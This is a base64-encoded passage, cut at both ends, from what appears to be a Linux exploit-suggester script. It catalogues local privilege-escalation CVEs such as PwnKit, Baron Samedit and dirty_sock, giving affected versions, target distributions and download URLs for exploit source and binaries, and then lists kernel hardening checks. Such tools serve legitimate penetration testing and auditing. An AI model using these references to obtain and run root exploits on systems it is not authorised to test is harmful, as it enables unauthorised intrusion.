zc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMjEtNDAzNF0ke3R4dHJzdH0gUHduS2l0ClJlcXM6IHBrZz1wb2xraXR8cG9saWN5a2l0LTEsdmVyPD0wLjEwNS0zMQpUYWdzOiB1YnVudHU9MTB8MTF8MTJ8MTN8MTR8MTV8MTZ8MTd8MTh8MTl8MjB8MjEsZGViaWFuPTd8OHw5fDEwfDExLGZlZG9yYSxtYW5qYXJvClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjIvMDEvMjUvY3ZlLTIwMjEtNDAzNC9wd25raXQudHh0CnNyYy11cmw6IGh0dHBzOi8vY29kZWxvYWQuZ2l0aHViLmNvbS9iZXJkYXYvQ1ZFLTIwMjEtNDAzNC96aXAvbWFpbgphdXRob3I6IGJlcmRhdgpFT0YKKQoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyMgc2VjdXJpdHkgcmVsYXRlZCBIVy9rZXJuZWwgZmVhdHVyZXMKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKbj0wCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpzZWN0aW9uOiBNYWlubGluZSBrZXJuZWwgcHJvdGVjdGlvbiBtZWNoYW5pc21zOgpFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogS2VybmVsIFBhZ2UgVGFibGUgSXNvbGF0aW9uIChQVEkpIHN1cHBvcnQKYXZhaWxhYmxlOiB2ZXI+PTQuMTUKZW5hYmxlZDogY21kOmdyZXAgLUVxaSAnXHNwdGknIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9wdGkubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEdDQyBzdGFjayBwcm90ZWN0b3Igc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19IQVZFX1NUQUNLUFJPVEVDVE9SPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1yZWd1bGFyLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIFNUUk9ORyBzdXBwb3J0CmF2YWlsYWJsZTogQ09ORklHX1NUQUNLUFJPVEVDVE9SX1NUUk9ORz15LHZlcj49My4xNAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0YWNrcHJvdGVjdG9yLXN0cm9uZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogTG93IGFkZHJlc3Mgc3BhY2UgdG8gcHJvdGVjdCBmcm9tIHVzZXIgYWxsb2NhdGlvbgphdmFpbGFibGU6IENPTkZJR19ERUZBVUxUX01NQVBfTUlOX0FERFI9WzAtOV0rCmVuYWJsZWQ6IHN5c2N0bDp2bS5tbWFwX21pbl9hZGRyIT0wCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvbW1hcF9taW5fYWRkci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUHJldmVudCB1c2VycyBmcm9tIHVzaW5nIHB0cmFjZSB0byBleGFtaW5lIHRoZSBtZW1vcnkgYW5kIHN0YXRlIG9mIHRoZWlyIHByb2Nlc3NlcwphdmFpbGFibGU6IENPTkZJR19TRUNVUklUWV9ZQU1BPXkKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC55YW1hLnB0cmFjZV9zY29wZSE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3lhbWFfcHRyYWNlX3Njb3BlLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSZXN0cmljdCB1bnByaXZpbGVnZWQgYWNjZXNzIHRvIGtlcm5lbCBzeXNsb2cKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfRE1FU0dfUkVTVFJJQ1Q9eSx2ZXI+PTIuNi4zNwplbmFibGVkOiBzeXNjdGw6a2VybmVsLmRtZXNnX3Jlc3RyaWN0IT0wCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZG1lc2dfcmVzdHJpY3QubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJhbmRvbWl6ZSB0aGUgYWRkcmVzcyBvZiB0aGUga2VybmVsIGltYWdlIChLQVNMUikKYXZhaWxhYmxlOiBDT05GSUdfUkFORE9NSVpFX0JBU0U9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2thc2xyLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBIYXJkZW5lZCB1c2VyIGNvcHkgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19IQVJERU5FRF9VU0VSQ09QWT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaGFyZGVuZWRfdXNlcmNvcHkubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IE1ha2Uga2VybmVsIHRleHQgYW5kIHJvZGF0YSByZWFkLW9ubHkKYXZhaWxhYmxlOiBDT05GSUdfU1RSSUNUX0tFUk5FTF9SV1g9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9rZXJuZWxfcnd4Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTZXQgbG9hZGFibGUga2VybmVsIG1vZHVsZSBkYXRhIGFzIE5YIGFuZCB0ZXh0IGFzIFJPCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9NT0RVTEVfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3RfbW9kdWxlX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQlVHKCkgY29uZGl0aW9ucyByZXBvcnRpbmcKYXZhaWxhYmxlOiBDT05GSUdfQlVHPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9idWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEFkZGl0aW9uYWwgJ2NyZWQnIHN0cnVjdCBjaGVja3MKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfQ1JFREVOVElBTFM9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RlYnVnX2NyZWRlbnRpYWxzLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBTYW5pdHkgY2hlY2tzIGZvciBub3RpZmllciBjYWxsIGNoYWlucwphdmFpbGFibGU6IENPTkZJR19ERUJVR19OT1RJRklFUlM9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RlYnVnX25vdGlmaWVycy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRXh0ZW5kZWQgY2hlY2tzIGZvciBsaW5rZWQtbGlzdHMgd2Fsa2luZwphdmFpbGFibGU6IENPTkZJR19ERUJVR19MSVNUPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19saXN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBDaGVja3Mgb24gc2NhdHRlci1nYXRoZXIgdGFibGVzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX1NHPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19zZy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBkYXRhIHN0cnVjdHVyZSBjb3JydXB0aW9ucwphdmFpbGFibGU6IENPTkZJR19CVUdfT05fREFUQV9DT1JSVVBUSU9OPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9idWdfb25fZGF0YV9jb3JydXB0aW9uLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBDaGVja3MgZm9yIGEgc3RhY2sgb3ZlcnJ1biBvbiBjYWxscyB0byAnc2NoZWR1bGUnCmF2YWlsYWJsZTogQ09ORklHX1NDSEVEX1NUQUNLX0VORF9DSEVDSz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2NoZWRfc3RhY2tfZW5kX2NoZWNrLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBvcmRlciByYW5kb21pemF0aW9uIG9uIG5ldyBwYWdlcyBjcmVhdGlvbgphdmFpbGFibGU6IENPTkZJR19TTEFCX0ZSRUVMSVNUX1JBTkRPTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9yYW5kb20ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEZyZWVsaXN0IG1ldGFkYXRhIGhhcmRlbmluZwphdmFpbGFibGU6IENPTkZJR19TTEFCX0ZSRUVMSVNUX0hBUkRFTkVEPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zbGFiX2ZyZWVsaXN0X2hhcmRlbmVkLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBbGxvY2F0b3IgdmFsaWRhdGlvbiBjaGVja2luZwphdmFpbGFibGU6IENPTkZJR19TTFVCX0RFQlVHX09OPXksY21kOiEgZ3JlcCAnc2x1Yl9kZWJ1Zz0tJyAvcHJvYy9jbWRsaW5lCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2x1Yl9kZWJ1Zy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogVmlydHVhbGx5LW1hcHBlZCBrZXJuZWwgc3RhY2tzIHdpdGggZ3VhcmQgcGFnZXMKYXZhaWxhYmxlOiBDT05GSUdfVk1BUF9TVEFDSz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvdm1hcF9zdGFjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUGFnZXMgcG9pc29uaW5nIGFmdGVyIGZyZWVfcGFnZXMoKSBjYWxsCmF2YWlsYWJsZTogQ09ORklHX1BBR0VfUE9JU09OSU5HPXkKZW5hYmxlZDogY21kOiBncmVwICdwYWdlX3BvaXNvbj0xJyAvcHJvYy9jbWRsaW5lCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcGFnZV9wb2lzb25pbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFVzaW5nICdyZWZjb3VudF90JyBpbnN0ZWFkIG9mICdhdG9t